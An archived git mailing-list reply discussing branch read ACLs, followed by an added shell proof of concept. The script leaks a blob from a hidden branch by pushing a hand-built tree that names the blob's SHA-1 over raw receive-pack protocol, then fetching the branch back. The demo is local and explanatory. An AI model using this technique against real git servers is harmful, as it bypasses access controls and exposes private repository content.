On Tue, May 17, 2011 at 7:36 PM, Shawn Pearce <spearce@xxxxxxxxxxx> wrote:
> On Tue, May 17, 2011 at 05:08, Sitaram Chamarty <sitaramc@xxxxxxxxx> wrote:

> Yes. Or, he has a SHA-1 he suspects is a tree or blob and lists that
> in a tree he pushes to a branch he can write to. Now he can fetch that
> branch back, and obtain that object whose SHA-1 he has but whose
> contents he does not have.

Good point. Not too hard too, I guess, unlike this one:

> There is another attack that is incredibly improbable, but that JGit

[snipped lots of complicated stuff]

> assume this theoretical attack is too improbable to succeed. (And it
> is given what we know about SHA-1 today.)

IMO most of the theoretical attacks are just that. They advance the
state of the art but I've not heard of any of them actually being used
in a real-life scenario. The sad fact is there are much weaker links
to be found if you look around and you don't need all this.

>> Having two repos is still the best plan ;-)
>
> Yes, but tell that to Gerrit Code Review users. They really use the
> branch ACL features. :-)

Interesting. I do a fair amount of git consulting and training
(in-house) and this has only come up once so far. I haven't seen it as
being that common at all.

--
To unsubscribe from this list: send the line "unsubscribe git" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
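The "list a SHA-1 you don't have in a tree you can push" trick that Shawn describes above, reproduced end to end against a local bare repository. This is an added example written for this page, not code from the thread, from git or from Gerrit. Assumptions: a branch read ACL is emulated with `transfer.hideRefs` on the server; because a stock `git push` refuses to pack a tree whose blob is absent locally, the attacker instead builds a pack holding only its own commit and tree and feeds it to `git receive-pack` by hand over the v0 pkt-line protocol; the repository names (`server.git`, `owner`, `attacker`, `harvest`), the branch names (`private`, `probe`), the path `leak.txt`, the function name `demo_sha1_leak` and the secret file content are all constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the thread): a writer of refs/heads/probe who knows
# only the SHA-1 of a blob on the read-protected branch refs/heads/private
# pushes a tree naming that SHA-1, then fetches the branch back to obtain
# the blob. The server accepts the push because its connectivity check only
# asks whether the referenced objects exist, and it already has the blob.
set -eu
export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.invalid
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.invalid
export GIT_CONFIG_GLOBAL=/dev/null GIT_CONFIG_NOSYSTEM=1   # isolate from user config

# Runs the whole scenario in a scratch directory; prints the recovered blob
# content on stdout (progress notes go to stderr) so callers can check it.
demo_sha1_leak() (
  work=$(mktemp -d)
  cd "$work"
  zero=0000000000000000000000000000000000000000

  # --- Victim side: bare "server" with a secret on refs/heads/private.
  git init -q --bare server.git
  git init -q owner
  printf 'top secret: rotate me\n' >owner/secret.txt     # constructed secret
  git -C owner add secret.txt
  git -C owner commit -q -m 'add secret'
  git -C owner push -q ../server.git HEAD:refs/heads/private
  secret_sha=$(git -C owner rev-parse HEAD:secret.txt)
  # Emulate a branch read ACL: the ref is neither advertised nor fetchable.
  git -C server.git config transfer.hideRefs refs/heads/private

  # --- Attacker side: an empty repo, knows $secret_sha, may write refs/heads/probe.
  git init -q attacker
  if git -C attacker fetch -q ../server.git refs/heads/private 2>/dev/null; then
    echo 'ACL emulation failed: private branch was fetchable' >&2
    exit 1
  fi
  if git -C attacker fetch -q ../server.git "$secret_sha" 2>/dev/null; then
    echo 'note: server allowed a direct want of the blob' >&2
  else
    echo 'direct fetch of the blob by SHA-1 refused, as expected' >&2
  fi

  # A tree that names the secret blob; --missing lets mktree write it even
  # though the blob is not in the local object store.
  tree=$(printf '100644 blob %s\tleak.txt\n' "$secret_sha" |
         git -C attacker mktree --missing)
  commit=$(git -C attacker commit-tree "$tree" -m probe)

  # Pack exactly these two objects. A normal "git push" would walk the tree,
  # try to read the blob and die; listing objects explicitly avoids the walk.
  printf '%s\n%s\n' "$commit" "$tree" |
    git -C attacker pack-objects -q --stdout >probe.pack

  # Speak receive-pack's protocol by hand: one pkt-line ref command
  # ("<old> <new> <ref>", length-prefixed in hex), a flush packet, then the pack.
  cmd="$zero $commit refs/heads/probe"
  {
    printf '%04x%s' $(( ${#cmd} + 4 )) "$cmd"
    printf '0000'
    cat probe.pack
  } | git receive-pack server.git >/dev/null
  echo "server accepted refs/heads/probe -> $(git -C server.git rev-parse refs/heads/probe)" >&2

  # Fetch the branch back into a fresh repository (a real attacker would clone
  # anew) so that negotiation has no local objects to skip; the server must
  # send commit, tree and the blob reachable through it.
  git init -q harvest
  git -C harvest fetch -q ../server.git refs/heads/probe
  git -C harvest cat-file -p "$secret_sha"
)

demo_sha1_leak
```

The decisive step is the server's connectivity check, which answers "do all objects reachable from the new tip exist here?" rather than "is the pusher allowed to read each of them?"; the hidden-ref configuration stops the attacker fetching `private` or asking for the blob by SHA-1 directly, but not this route. The same check that makes a plain `git push` of this tree fail on the client (no blob to pack) is exactly what the hand-built pack sidesteps.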